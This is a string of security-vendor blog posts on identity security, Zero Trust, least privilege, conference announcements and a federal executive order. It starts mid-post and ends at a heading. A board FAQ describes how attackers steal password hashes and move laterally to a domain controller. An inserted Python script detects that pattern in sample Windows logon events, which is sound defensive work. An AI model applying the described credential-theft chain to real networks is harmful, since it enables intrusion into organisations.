In general, managing the lifecycle of passwords and privileges based on identity within the context of a task will be crucial. End-users need to be able to assign a higher level of privilege in a just-in-time fashion to complete a specific task, based on their specific identity or the role they play within an organization. The goal is to enable organizations to implement Zero Trust policies in a way that doesn’t jarringly disrupt business process workflows. Naturally, there will also be a need to provide the monitoring tools so that IAM and PAM capabilities are being optimally employed.

Most organizations had already begun to gradually transition toward Zero Trust IT architectures. The COVID-19 pandemic simply accelerated that shift once IT organizations realized many employees would continue to work from anywhere for the long run. The challenge is finding a way to implement Zero Trust principles and capabilities seamlessly, so that employees, customers and business partners neither reject them out of hand nor, more likely, waste countless hours trying to find a way to work around them.

Editor’s note: CyberArk Impact Live 2021 has wrapped, but you can still register to enable playback sessions on demand.

Least Privilege in The Cloud (and Everywhere Else) https://www.cyberark.com/blog/least-privilege-control-from-endpoint-to-cloud/ Wed, 09 Jun 2021 13:00:29 +0000 https://www.cyberark.com/?p=119119

Mark Twain once wrote that “History never repeats itself, but it often rhymes.” This is especially true in the world of cybersecurity. By examining some of the major breaches over the past decade, a repetitive attack chain is clear: external adversaries or internal threat actors target and compromise an identity to launch their attack, then escalate privileges, move laterally, and manipulate privileged access to reach sensitive data. And today, as cloud adoption surges, this pattern is seen acutely in cloud environments.

A Recent History of Identity-Centric Attacks

2013: A privileged insider used legitimate access to leak highly classified government information. The need to minimize standing and unnecessary privileged access to critical systems became a top-of-mind issue for both public and private sectors.

2014: An attack chain involving privileged credential abuse and escalation nearly crippled a leading entertainment company — prompting some organizations to take a closer look at Zero Trust frameworks.

2015: A country’s power grid was attacked when threat actors compromised valid credentials from an employee workstation, escalated privileges and moved laterally to gain control of SCADA systems. More than 225,000 people were left in the dark.

2016: By abusing privileged credentials, attackers were able to reach SWIFT systems and illegally transfer $81 million in this international bank heist.

2016-2017: Millions of sensitive customer and personnel records were exposed inadvertently in a string of separate breaches after third parties misconfigured cloud storage databases to allow public access. This highlighted the critical need to protect cloud credentials with strong privileged access controls and improve overall visibility of misconfigurations.

2017: A massive ransomware attack encrypted hundreds of thousands of computers across more than 150 countries. Subsequent research demonstrated that a combination of least privilege enforcement — via removal of local admin rights — and restricting applications were 100 percent effective in preventing ransomware from encrypting files.

2019: By way of a misconfigured firewall, an attacker entered a financial services organization’s cloud provider network and accessed a cloud virtual machine (VM). By assuming an over-permissioned role, the attacker obtained temporary privileged credentials to the company’s cloud database, exposing troves of personal data and costing the organization millions of dollars in regulatory fines.

2020: This digital supply chain attack was unprecedented in sophistication and scale, but one aspect was all-too-familiar: the compromise of identities and privileged access on-premises and in the cloud. In a post-breach U.S. Senate hearing and numerous briefings, the message was clear: In our mobile, cloud world, identity is the new security battleground and the only practical control plane.

2021: Advanced persistent threat actors found vulnerabilities in a leading employee productivity suite, allowing the unauthenticated attackers to elevate privileges and control infrastructure, whether hosted on-premises or in the cloud. At least 30,000 U.S. organizations were impacted.

Now More than Ever: The Imperative for Least Privilege

Identity-related attacks are clearly nothing new, but they’re happening with alarming frequency in cloud environments, and often targeting cloud-hosted workloads. This makes sense, since 90% of organizations have accelerated their consumption of cloud services since COVID-19, according to a recent Flexera report.

In this era of security uncertainty, organizations are revisiting foundational practices like least privilege — when identities have their privileges and permissions restricted to bare minimum access — to mitigate risk and defend their growing cloud estates.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently issued an analysis report to provide guidance on this front with specific recommendations such as eliminating access from employee personal devices, securing privileged access to cloud services, strengthening access controls with multi-factor authentication (MFA), and adopting a “Zero Trust mindset.”

Zero Trust = Zero Excessive Privileges

In a Zero Trust cybersecurity model, organizations recognize that as they store their data, applications and infrastructure in the cloud and embrace remote work models, their IT environments are no longer defined by a physical perimeter. Zero Trust architectures reflect this shift away from a static perimeter toward individual users, assets and resources — or, simply, identities. By “assuming breach,” organizations grant no implicit trust to human or machine identities; all must be continuously authenticated and authorized.

Least privilege access is a core authorization tenet of Zero Trust, recommended by both the U.S. National Security Agency and the U.S. National Institute of Standards and Technology (NIST).

By granting identities the minimum necessary privileges and permissions, a compromised identity can be stopped from gaining the privileges needed to progress an attack. In other words, if — or rather, when — a breach occurs, least privilege prevents access to mission-critical infrastructure, minimizing the “blast radius” of an attack. Establishing least privilege also limits the number of entities that can grant or configure new permissions, making it more difficult for attackers to reach their goals.

Least Privilege: Easier Said than Done?

Of course, organizations face notable challenges when implementing least privilege in the cloud. Visibility across distinct environments is one hurdle: Just as organizations must remove excessive privileges for myriad types of endpoints and servers, they must also manage entitlements to access unique varieties of cloud-hosted infrastructure, containers and Kubernetes clusters. This can be even more difficult in cloud environments, where any human or machine identity can be configured (or misconfigured) with permissions to access privileged information. In fact, 19% of all data breaches can be attributed to misconfigured cloud infrastructure, according to IBM research.

And when organizations embrace a multi-cloud strategy — as 92% of them do — the potential for identity and access management (IAM) misconfigurations grows. Based on CyberArk data, we estimate there are more than 23,000 potential permissions that must be properly configured and securely managed across leading IaaS providers.

New CyberArk AWS Marketplace Offerings Accelerate Least Privilege Control and Risk Reduction

Today, we’re proud to announce the availability of CyberArk Cloud Entitlements Manager, CyberArk Endpoint Privilege Manager, and CyberArk Workforce Identity on Amazon Web Services Marketplace. These new offerings underscore our commitment to helping enterprises adopt a risk-based strategy for defending against identity-based attacks as they embrace the cloud, remote work, and other digital transformation initiatives.

Together, Cloud Entitlements Manager, Endpoint Privilege Manager, and Workforce Identity allow organizations to remove excessive privileges and permissions on endpoint devices, macOS platforms, servers, and VMs and throughout their cloud environments, deliver a frictionless user experience and enforce least privilege everywhere. Removing unnecessary privileges helps organizations limit lateral movement and stop privilege escalation to defend against attacks compromising identities.

Learn from History. Lead with Least Privilege

Attackers are zeroing in on identities to compromise cloud environments. For this reason, modern identities deserve Zero Trust. Don’t become part of history’s rhyme. Learn from it and change the verse by embracing a holistic strategy that starts with least privilege. Get started with a CyberArk Cloud Entitlements Manager free trial, a CyberArk Endpoint Privilege Manager free trial, a CyberArk Workforce Identity free trial or visit CyberArk on AWS Marketplace.

Live from Impact 2021: Shaping the Future of Identity Security https://www.cyberark.com/blog/impact-2021-shaping-the-future-of-identity-security/ Tue, 08 Jun 2021 19:00:41 +0000 https://www.cyberark.com/?p=119108

In the spirit of looking forward with renewed confidence and optimism, thousands of cybersecurity professionals joined us today to kick off CyberArk Impact Live 2021, the world’s largest virtual gathering focused on Identity Security.

Our 15th annual event offers an immersive two-day digital experience featuring more than 50 keynotes, breakouts, and training sessions. There’s a palpable energy and excitement around shaping the future of Identity Security together.

Evolving in a Rapidly Changing World and Embracing It

In his opening keynote, CyberArk Chairman and CEO Udi Mokady applauded cybersecurity professionals for their tireless commitment, sacrifices, and efforts throughout the extraordinary pandemic-era race to enable new work models — while at the same time defending their organizations against unrelenting attacks.

He outlined three major trends that will influence the months ahead, urging participants to focus and stay the course in a time when “… the demands on each of us as cybersecurity professionals — to protect our organizations, our economies, our government operations and our way of life have never been greater.”

  • Digital transformation and cloud migration are moving full steam ahead. In 2020, for the first time, organizations invested more in cloud infrastructure than in on-premises data centers, going all-in on services from cloud providers to supercharge their digital transformation. Meanwhile, many software development teams adopted new DevOps methodologies to automate processes and enable high-velocity innovation. While these initiatives continue to accelerate, threat actors are now targeting a quickly expanding attack surface, where any user can have some level of privileged access.
  • Identity is the new battleground. The rapid move to work from anywhere dissolved any remaining notions of a traditional network perimeter. Recent findings from the CISO View 2021 Survey underscore this new reality: 97% of security executives are seeing an increase in credential theft, while more than half say attacks on end-users and their endpoints have increased. With this as a backdrop, there’s broad consensus around the value of Zero Trust and a growing sense of urgency for securing privileged access. Senior executives view Identity Security controls as their top priority for making Zero Trust a reality to protect their most valuable resources.
  • Attacker innovation is accelerating. Attackers are upping their game to compromise identities and escalate privileges, so they can gain access to organizations’ most sensitive assets in three major ways. First, they’re using more sophisticated techniques, such as the Golden SAML method used in the SolarWinds digital supply chain attack. Second, they’re getting much more targeted with spear-phishing and impersonation attacks, often focusing on end-users who have high-value access to specific systems. And third, they are becoming bolder and finding more ways to scale their impact, as evidenced by the recent surge in double-extortion ransomware attacks.

Identity compromise is the common denominator in all these attacks — and the abuse of privileged access is almost always a factor in the attack chain. Organizations must evolve their cybersecurity programs by taking a security-first, least privilege view of identity-related risk to help eliminate security gaps.

Transforming the CyberArk Identity Security Vision into Reality

Since unveiling the CyberArk Identity Security vision last year at Impact, we’ve had many strategic conversations with cybersecurity leaders. These discussions have been invaluable in further shaping our strategy and helping to inform our view of the future.

By harnessing these insights — and with a relentless focus on innovation — we’ve evolved the CyberArk Identity Security Platform into a comprehensive set of Software-as-a-Service (SaaS) and self-hosted solutions over the past year. Centered on privileged access management, the platform provides customers a unified and holistic approach to securing standing and dynamic access for any user, across any type of application or system — from anywhere, using any device.

Today at Impact 2021, we announced new software services and platform advancements to help organizations secure high-risk access and broaden protection across cloud and hybrid environments. These innovations extend our commitment to our customers as they drive forward digital transformation, execute on cloud migration initiatives, achieve Zero Trust — and, most importantly, defend against advanced cyberattacks. We’re proud to introduce:

  • CyberArk Dynamic Privileged Access: Drastically reduces risk of standing access by provisioning just-in-time access to hybrid and cloud workloads starting with Linux and Windows Virtual Machines. Dynamic Privileged Access also includes full audit capabilities, providing insight into exactly who accessed what and when. Only CyberArk secures both standing and dynamic access across hybrid and multi-cloud environments while enforcing least privilege controls.
  • CyberArk Secure Web Sessions: Adds additional layers of security to high-risk browser-based applications access via continuous monitoring, re-authentication enforcement, and isolation of malicious processes originating on end-user devices. Secure Web Sessions enables enterprises to record and audit risky user behavior within any web application while maintaining a frictionless user experience.
  • CyberArk Lifecycle Management for Privileged Users: An expansion of existing capabilities, customers can now further expedite employee onboarding, including those with privileged access, and meet audit and compliance mandates more efficiently. Lifecycle Management for Privileged Users integrates with existing solutions and can also work with HR-driven identity management solutions, providing further flexibility to enterprises.
  • In addition to these new SaaS solutions, we unveiled new cloud-native shared services that are available to customers running CyberArk software on-premises, in their own clouds, or managed by CyberArk. Services include a unified identity management, authentication, and authorization layer, AI-powered Identity Security analytics, an integrated Identity Agent, and more. These new services will dramatically improve operational efficiencies and reduce risk for security teams.
  • And in response to feedback from our extensive CyberArk Commons Community of developers, engineers and security professionals, we’re proud to introduce Conjur Cloud, a SaaS-based version of our Conjur secrets management solution.

Dynamic Privileged Access and Secure Web Sessions will be generally available by the end of the year. Conjur Cloud and the next iteration of Lifecycle Management capabilities for Privileged Users will be available in 2022.

Moving Fearlessly Forward Together

All of this — our Identity Security vision, platform, shared services, and new solutions — is the culmination of a multi-year effort to define and build a cybersecurity approach for the next decade.

Today, the breadth and depth of CyberArk’s platform is unmatched. We are building a highly differentiated Identity Security Platform centered on privileged access and investing in SaaS while continuing to address self-hosted customer needs.

But of course, there’s much yet to come as we continue to innovate to address current and future Identity Security requirements. We’re honored and humbled to be on this journey alongside our customers and partners. Together, we can make huge FUTURE IMPACT as we go forward — for your careers, your organizations, your communities and for the cybersecurity industry as a whole.

If you haven’t registered for CyberArk Impact Live yet, there’s still time! We’ve got another exciting day lined up for tomorrow, Wednesday, June 9. Register now to hear inspiring keynotes, attend live technical sessions with industry visionaries, hear new research presented by CyberArk researchers and also enable playback sessions on demand.

Why Cybersecurity Executive Order Takes Big Steps Toward Marshaling US Cyber Defenses https://www.cyberark.com/blog/why-cybersecurity-executive-order-takes-big-steps-toward-marshaling-us-cyber-defenses/ Thu, 03 Jun 2021 13:53:17 +0000 https://www.cyberark.com/?p=118698

Sometimes, it takes a significant event — a “forcing function” — to catalyze significant change. It can even take more than one. A series of cyber attacks with real-world implications and far-reaching impact recently culminated into a moment of action. On May 12, the Biden administration issued a highly anticipated executive order aimed specifically at strengthening the country’s cybersecurity defenses — with strong emphasis on Zero Trust.

According to a White House statement, “This executive order makes a significant contribution toward modernizing cybersecurity defenses by protecting federal networks, improving information-sharing between the U.S. government and the private sector on cyber issues, and strengthening the United States’ ability to respond to incidents when they occur.”

The order also calls for stronger cybersecurity standards for technology partners that provide software and services to the federal government — building on earlier efforts such as the Cybersecurity Maturity Model Certification (CMMC) introduced by the Department of Defense in 2020.

While the executive order focuses primarily on federal agencies and their partners, government officials and cybersecurity pundits alike believe it could drive sweeping change across the private sector — both nationally and abroad.

Kevin Corbett, Director of U.S. Federal Business at CyberArk, has been working in the federal cybersecurity space for more than 25 years. It’s a world he knows intimately, from civilian agencies to the Department of Defense to the intelligence community.

Asked for his impressions of the executive order and its intended implementation, Corbett says he sees it as more than just words on a paper. “We’ve witnessed a 10-year evolution as the government has shifted from a governance and compliance focus to a more proactive, risk-based approach to cybersecurity that drives far better, more sustainable outcomes,” he explains.

The push toward cybersecurity standardization began in earnest, Corbett says, well before SolarWinds, after the massive 2015 Office of Personnel Management (OPM) breach. While the government has been making moves in the right direction, progress has not always kept pace with the speed of attacker innovation.

Adding Teeth to the Paper Tiger

Corbett applauds the executive order as a significant milestone for national security but knows there is still work to be done here. “Right now, it reads like a paper tiger,” Corbett says. To drive action and long-standing impact, guidance must become more prescriptive. That starts with standardizing definitions for abstract concepts and best practices and extends to the enforcement of punishment for non-compliance — something not currently laid out in the order.

It’s similar to a person trying to improve their health, he notes. A doctor simply saying “get healthier” doesn’t have the same impact as giving you specific steps to follow, such as switching from soda to water or walking 30 minutes every day. Once you’ve tackled these basics, you can then move on to more advanced exercise or diets — the point being that it’s easier to demonstrate progress and improvement once these specifics are laid out.

Clarity is key, Corbett says. For example, the executive order says that agencies must submit a new plan on moving to Zero Trust. But how exactly is Zero Trust being defined, and where, he asks, “… does the rubber meet the road?”

It may be impossible to establish one set of rules or one type of protocol.

“One of the harshest realities that we have in our industry is the pace of innovation, the pace of application development, the pace of new platforms being developed, new business processes — even new hardware platforms are able to outpace our ability to keep those things secure,” Corbett says.

Rather than attempt to plug holes or fortify defenses, it is more effective for all to adopt the “assume breach” mentality that fuels Zero Trust. This will keep agencies and organizations from trying to figure out where the next breach will happen (a futile effort that is doomed to always be a step behind) and instead just assume the bad actors are already inside. The key, then, is to make sure you have the processes in place to make it as difficult — and as costly — as possible for attackers to reach their goals.

Leveling Up

In fact, this is part of what the CMMC aims to do. First introduced by the Department of Defense in January 2020, this standardized framework represents an important step in strengthening the nation’s cyber resilience. In a sense, it’s been laying the groundwork for much of what the executive order is aiming to accomplish — namely, modernizing the federal government’s cybersecurity, fortifying the security of software for purchase by the federal government and, perhaps most importantly, improving the communication and collaboration between the government and private sectors so that there is more of a team approach to cyber attack defense and response. “The CMMC is the DoD’s first effort into a more thoughtful and hands-on approach to supply chain security,” Corbett says.

Created in response to compromises and breaches stemming from vulnerabilities in third-party contractors’ IT systems, the CMMC applies to more than 300,000 companies in the DoD’s supply chain. Rather than having contractors self-report that their systems are compliant (a bit of “take our word for it”), the CMMC lays out a five-tier system that rates a company’s maturity and compliance. Each tier represents, essentially, how close the company comes to sensitive information.

A landscaping company that does work for government agencies, for example — even if there is a possibility it comes into contact with Personally Identifiable Information (PII) — would nonetheless be seen as a lower-tiered organization and would have far less stringent regulations (and expectations). A contractor building advanced weapons systems for the military, on the other hand, would require the highest levels.

Over the years, though, Corbett says he’s seen inconsistencies even within the government itself, which adds complications to its quest to regulate others through a comprehensive policy. He explains, “Agencies get grades, and we see As and Bs, but we also see Ds and Fs. And the reasons why can be numerous — from budget to a dearth of qualified cybersecurity professionals.”

Corbett suggests the government may need to reach out to cybersecurity experts across sectors to create a set of best practice guidelines and standard definitions — organizations that, say, have been pushing for Zero Trust maturity for some time now. It will take a lot of collaboration, guidance, and a host of perspectives and backgrounds to keep it “moving forward,” a phrase Corbett says he and his colleagues use frequently. “There is no silver bullet relative to cybersecurity. It’s a team sport.”

When all’s said and done, the CMMC is positioned to be another useful tool rather than a be-all, end-all solution, Corbett says. It’s not perfect; it’s a bit of a work in progress, but it’s a push in the right direction toward more comprehensive guidelines and, ultimately, a better understanding of how to tackle cybersecurity seriously, consistently, and permanently.

How to Communicate the Identity Security Imperative to Your Board https://www.cyberark.com/blog/how-to-communicate-the-identity-security-imperative-to-your-board/ Tue, 01 Jun 2021 13:00:29 +0000 https://www.cyberark.com/?p=118659 Communicate Identity Security to Board

Despite numerous business-level issues jockeying for space on the board agenda, there isn’t an executive team on the planet that isn’t talking about cybersecurity today. The SolarWinds breach, unrelenting ransomware attacks and evolving digital threats have kept the topic high on the priority list.

As a CISO, security leader or director of IAM, you may feel some relief that security responsibility has spread far beyond the walls of IT, across lines of business and into the board room. But this relief is likely tempered by increased scrutiny and pressure to communicate cyber risk in ways that executive leadership and the board of directors can more easily understand and act on.

Gartner IAM Summit: “Cybersecurity Begins and Ends with Identity”

In her recent Gartner Identity & Access Management (IAM) Summit keynote, Tricia Phillips, Senior Director Analyst, Gartner, described how the COVID-19 crisis disrupted every aspect of life; introduced a new distributed, decentralized world; and accelerated transformation projects. In this sustained period of disruption, she noted, identity has become the “ultimate attack surface,” and now “cybersecurity begins and ends with identity.” She urged IAM leaders to take their place as the first, and often last, line of defense against the malicious use of human and machine identities.

Communicate with Confidence: An Identity Security FAQ for Executive Leadership and the Board

With identity as the new security battleground, it’s clear an assume breach mentality, based on Zero Trust principles of “never trust, always verify,” is absolutely critical. You’re living and breathing this reality every day but may be searching for ways to strengthen your message for non-technical business decision-makers. Use the following FAQ to guide your board room discussions and help articulate why Identity Security matters now — without getting lost in the weeds.

Q: How can we protect our environment from advanced attacks like those seen in the news?

A: Cyber attackers are constantly innovating, and even the strongest defenses can be breached. Because of this, we are enforcing multiple layers of security to reduce the greatest amount of risk. And by “assuming breach,” we’re focused on finding and stopping threats from within before they can reach critical systems and cause harm.

We know that nearly 100% of major cyberattacks follow a similar attack chain: 1) Steal and abuse the identities and credentials to get inside; 2) Use these legitimate credentials to move around the network looking for high-value targets; 3) Exploit privileged credentials that provide powerful access to accomplish their goals.

Identity-based security controls are critical for detecting and thwarting attacks that have already made their way inside the organization’s infrastructure. With them in place, we can focus on protecting our most valuable assets to prevent data theft and disruption. Without them, we are at risk of a data breach similar to the major attacks that keep making headlines.

Based on recent Gartner guidance* and analysis of several major breaches, we know what specific improvements are needed to minimize exposure. During an initial rapid risk reduction effort, we will put in place key controls that make it much more difficult for attackers to carry out these types of attacks against us.

Dig deeper: Learn why adopting a “sprint mindset” is one of the most important factors in achieving rapid risk reduction. It helps spark a sense of urgency and progress — without the overarching pressure of resolving an actual breach.

Q: Why are privileged identities and credentials a priority compared to other security goals?

A: Identities are everywhere in our IT environment. And due to the mobile, cloud-based nature of our business, every corporate identity — both human and machine — can have privileged access under certain conditions. For example:

  • A developer who requires access to source code to create new software offerings
  • An application that needs high-level privileges to access corporate resources to perform its intended task
  • A third-party vendor who needs to access sensitive corporate data remotely to deliver services

According to Gartner, “The identity and access management (IAM) system is clearly a rich target opportunity for advanced attackers” and “privileged accounts are a primary target.”*

With privileged accounts and credentials, an attacker can access intellectual property, business secrets, and sensitive customer information. And with high levels of access to information systems, the attacker can also deactivate existing security technologies, such as multi-factor authentication, data encryption, firewalls, and detection systems — often without raising red flags.

Gartner states that “Mitigating this risk often requires privileged accounts to be managed by a Privileged Access Management (PAM) tool. PAM tools help vault privileged passwords, limit accesses to authorized users, rotate credentials frequently and monitor the usage of privileged accounts.”*

Dig deeper: Explore the anatomy of the SolarWinds attack chain to see how threat actors used highly privileged credentials to successfully bypass endpoint and network-based security controls.

Q: What techniques are attackers using to launch identity-based attacks?

A: According to the latest Verizon Data Breach Investigations Report 2021, 85% of breaches involve the human element. The first step in the attack chain is often marked by a spear-phishing or impersonation attack aimed at stealing an identity’s credentials. Users are tricked into clicking on a link or opening an attachment in an email that downloads malware to their workstation. Ransomware infections work in similar ways — and as tactics have evolved, the number of successful ransomware attacks has doubled since last year.

Once the malware is downloaded onto a desktop, laptop, or server, attackers can gain entry to the environment. For example, in Windows environments, they take advantage of the way devices store credentials: Password “hashes” are saved in computer memory for all users who have recently logged into that machine. By stealing the hash for an administrative password, an attacker can get access to multiple machines. They search each machine’s memory for other password hashes that, in turn, provide access to more valuable machines like database servers or, the biggest prize, the domain controller used to manage access to all computing resources. Once they reach the domain controller, they can create “tickets” to log into any critical asset on the network, shut down security systems and take full control of information systems.
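The chain described above leaves a recognizable trace in logs: one account performing NTLM network logons to many distinct hosts in a short window, ending at a domain controller. The following detection heuristic is an added example, not part of the original post; the event fields approximate Windows Security event 4624 (logon type 3 = network logon), the sample events are constructed, and the thresholds and the domain controller host name are assumptions to tune per environment.

```python
"""Flag possible credential-reuse lateral movement in Windows logon events.

Constructed sample events (not real logs) carry a subset of the fields of
Windows Security event 4624: logon_type 3 is a network logon and
auth_package NTLM is the package used when a stolen hash is replayed.
Heuristic: one account reaching >= MIN_HOSTS distinct hosts over NTLM
network logons inside WINDOW. Thresholds are assumptions, not a standard.
"""
from collections import defaultdict
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=10)   # assumption: tune per environment
MIN_HOSTS = 3                    # assumption: tune per environment
DC_HOSTS = frozenset({"DC01"})   # assumption: your domain controllers

# Constructed sample events. jdoe-admin fans out across four hosts in six
# minutes and ends on the DC; svc-backup touches two hosts an hour apart.
SAMPLE_EVENTS = [
    {"time": "2021-05-20T09:00:05", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "account": "jdoe-admin", "target_host": "FS01"},
    {"time": "2021-05-20T09:01:40", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "account": "jdoe-admin", "target_host": "SQL02"},
    {"time": "2021-05-20T09:02:00", "event_id": 4624, "logon_type": 3,
     "auth_package": "Kerberos", "account": "jdoe-admin", "target_host": "FS01"},
    {"time": "2021-05-20T09:03:12", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "account": "jdoe-admin", "target_host": "WEB03"},
    {"time": "2021-05-20T09:05:50", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "account": "jdoe-admin", "target_host": "DC01"},
    {"time": "2021-05-20T08:30:00", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "account": "svc-backup", "target_host": "FS01"},
    {"time": "2021-05-20T09:45:00", "event_id": 4624, "logon_type": 3,
     "auth_package": "NTLM", "account": "svc-backup", "target_host": "FS02"},
    {"time": "2021-05-20T09:10:00", "event_id": 4624, "logon_type": 2,
     "auth_package": "Negotiate", "account": "alice", "target_host": "WS-014"},
]


def _parse_time(value):
    return datetime.fromisoformat(value)


def detect_lateral_movement(events, window=WINDOW, min_hosts=MIN_HOSTS,
                            dc_hosts=DC_HOSTS):
    """Return {account: finding} for accounts whose NTLM network logons
    reach at least min_hosts distinct hosts within any window-long span.

    Each finding lists the hosts, whether a domain controller was among
    them, and the span of the widest qualifying window.
    """
    # Only successful NTLM network logons are relevant to this pattern;
    # interactive logons and Kerberos logons are dropped up front.
    by_account = defaultdict(list)
    for e in events:
        if e["event_id"] != 4624 or e["logon_type"] != 3:
            continue
        if e["auth_package"].upper() != "NTLM":
            continue
        by_account[e["account"]].append((_parse_time(e["time"]), e["target_host"]))

    findings = {}
    for account, logons in by_account.items():
        logons.sort()                 # time order for the sliding window
        best_hosts, best_span = set(), None
        start = 0
        for end, (t_end, _) in enumerate(logons):
            # Advance the window start until the span fits inside `window`.
            while t_end - logons[start][0] > window:
                start += 1
            hosts = {host for _, host in logons[start:end + 1]}
            if len(hosts) >= min_hosts and len(hosts) > len(best_hosts):
                best_hosts = hosts
                best_span = (logons[start][0], t_end)
        if best_hosts:
            findings[account] = {
                "hosts": sorted(best_hosts),
                "reached_dc": bool(best_hosts & set(dc_hosts)),
                "first_seen": best_span[0].isoformat(),
                "last_seen": best_span[1].isoformat(),
            }
    return findings


if __name__ == "__main__":
    for account, finding in detect_lateral_movement(SAMPLE_EVENTS).items():
        severity = "HIGH (domain controller reached)" if finding["reached_dc"] else "MEDIUM"
        print(f"{account}: {severity} hosts={finding['hosts']} "
              f"{finding['first_seen']} .. {finding['last_seen']}")
```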

Dig deeper: Explore the unique challenges of securing identities in hybrid cloud environments and three real-world attacks.

Q: Which user groups within our organization are most at risk of identity-based attacks?

A: Attackers used to go straight for IT admins with high levels of access. But recent research shows that non-technical user populations are being targeted with increasing frequency, such as business users with access to sensitive data (i.e., payroll and HR), senior leadership, and third-party vendors.

Developers are also a key target for advanced attackers. Gartner notes that “SolarWinds’ code was compromised in the development process, which has significant implications for the development community.”*

By compromising a privileged identity like a developer or pipeline orchestrator or infrastructure manager, attackers can dramatically scale their reach and impact — infecting customer-facing products and services and threatening the stability of the entire digital supply chain.

The urgency around protecting software development pipelines is coming from the highest levels of government. The White House issued a cybersecurity executive order this month, noting in a statement that “Too much of our software, including critical software, is shipped with significant vulnerabilities that our adversaries exploit. This is a long-standing, well-known problem, but for too long we have kicked the can down the road.”

Dig deeper: Explore use cases and best practices for securing privileged access in development environments, from validating the integrity of all code and builds to enforcing just-in-time access policies in these highly automated environments.

Q: How will you increase protection of identities and privileged credentials?

A: We’ve adopted a Zero Trust approach to security, in which no actor can be trusted unless they’re continually verified. Zero Trust isn’t a specific technology but instead an approach that helps to ensure every user’s identity is verified, their devices are validated and their access is intelligently limited to just what they need — and taken away when it’s not needed.

Our strategy is to implement Identity Security controls that are foundational to this Zero Trust approach. These controls center on defending against three of the most common attack chain phases and will be deployed in risk-prioritized phases to help:

  1. Block credential theft on the endpoint and prevent ransomware attacks
  2. Stop lateral and vertical movement
  3. Prevent privileged escalation and abuse

This approach aligns with best practices recommended by leading authorities such as NIST, CISA, and NSA.

Dig deeper: Discover how the CyberArk Blueprint can provide your team with measurable risk-based advice to defend against identity-based attacks.

Q: How are other companies tackling identity-related challenges, and how do we benchmark our progress against industry peers?

A: A vast majority of recently surveyed security leaders see Zero Trust as key to mitigating risk: 88% say transitioning to a Zero Trust model is “important” or “very important.” To do this, Identity and Access Management (IAM) controls were cited as the No. 1 priority by 45% of respondents.

We’re following proven maturity frameworks from NIST and the Identity Defined Security Alliance to baseline, report on, and continuously measure the progression of our Identity Security posture. We’ve also tapped into guidance published by a group of Global 1000 CISOs on protecting identities and privileged access while transitioning to Zero Trust.

Dig deeper: Explore these five fundamental steps to help you establish parameters for your Identity Security program, define your risk tolerance and use meaningful metrics to report on outcomes. And see how the CyberArk Blueprint can provide your team with measurable risk-based advice to defend against identity-based attacks.

Q: How will Identity Security help advance our core digital transformation initiatives?

A: Implementing stronger security controls that minimize breach impact and protect what matters most is a core objective. Equally important is enhancing productivity, user experiences, and customer value. This is what will ultimately define our success as an organization. An identity-centric approach to security can help us achieve these objectives in unison.

Dig deeper: Aligning with business leadership requires an understanding of their own challenges and priorities, and the ability to think like a businessperson first (and a security person second). It’s important to demonstrate how Identity Security solutions can enable the digital business.

Q: What do you need from corporate leadership to make an Identity Security program successful?

A: By setting the right tone from the top, you can help ensure that we can successfully deploy a new set of Identity Security controls across the enterprise. Although security will drive the project, the affected systems are owned by the business. It will require cross-functional support. Some stakeholders will balk at the changes that must be made, such as giving up access rights or following new processes. Direction from leadership is crucial to moving ahead rapidly and maintaining momentum for sustained success.

Dig deeper: When making your business case for Identity Security, make sure you’re armed with data that demonstrates how the right approach can drive operational efficiencies and positive financial impact. And don’t go it alone: Enlist the support of others, such as risk management teams, to make cyber risk data “real” in the context of broader business goals.

Attackers understand that all roads lead back to identity. Without adequate controls to protect identities throughout the cycle of accessing critical assets, organizations leave themselves exposed. Gaining executive-level support for an Identity Security program is the first step toward strengthening overall cyber resilience. Use this FAQ to make those critical conversations count.

*Gartner, “Top 10 Lessons Learned From the SolarWinds Attack,” 17 February 2021. Peter Firstbrook

RSA 2021: How CISOs Can Build Cyber Resilience for the Road Ahead https://www.cyberark.com/blog/rsa-2021-how-cisos-can-build-cyber-resilience-for-the-road-ahead/ Thu, 27 May 2021 13:51:08 +0000 https://www.cyberark.com/?p=118452 RSA Cyber Resilience Lessons

From captivating keynotes to impromptu coffee line chats to networking party hopping, there’s nothing like being together with thousands of industry peers for the RSA Conference. But while we missed the annual trek to San Francisco, this year’s all-virtual event held true to tradition, spotlighting the biggest trends shaping 2021, along with insights from some of the brightest minds in cybersecurity.

The 30th annual event’s theme of “Resilience” was woven across all 735 event talks, honoring three decades of industry accomplishments and celebrating the resilience CISOs, security leaders and their teams have demonstrated throughout this time of pandemic upheaval.

RSA 2021 Resilience

Source: RSA Conference

As CISOs and senior security leaders look ahead, this notion of resilience remains top-of-mind. They’re grappling with hard questions such as: “How must cybersecurity operations evolve to drive resilience in this new threat landscape?” “How can I keep cybersecurity at the forefront of business-level discussions, even after times of crisis have passed?” And, “How can cybersecurity become a transformation-enabler that’s directly linked to business success?”

As we reflect on the innovation, research, and education coming out of RSA 2021, seven key themes stood out to us. All will play a role in shaping the evolving — and expanding — role of the resilient CISO.

1. The Way We Work, Reimagined

The global pandemic has been the largest test yet for the future of distributed work. Remote workers have proven to be incredibly resilient as they continue to rise to the challenge of blending home and work lives. Now, as many regions of the world come out of lockdown, CISOs have a unique opportunity to provide strategic direction for sustained remote and hybrid work models — moving from legacy approaches and implementing new digital security strategies and user-friendly tools and policies that empower workers (wherever they may be).

2. Zero Trust is the Way… But One Size Does Not Fit All

There’s broad consensus around the value of Zero Trust. In fact, we lost count of how many times it came up during the conference. The complexity of today’s cybersecurity challenges demands a “trust nothing, verify everything” approach that repositions the security perimeter around individual identities.

But Zero Trust isn’t a one-size-fits-all kind of thing. The best way for CISOs to get started is to identify the organization’s greatest security risks — address them first, then extend controls to new areas over time. Equally important is mapping the change management journey and working with IT and end-users to understand and adopt this new mindset.

3. Think Like an Attacker to Minimize Attack Impact

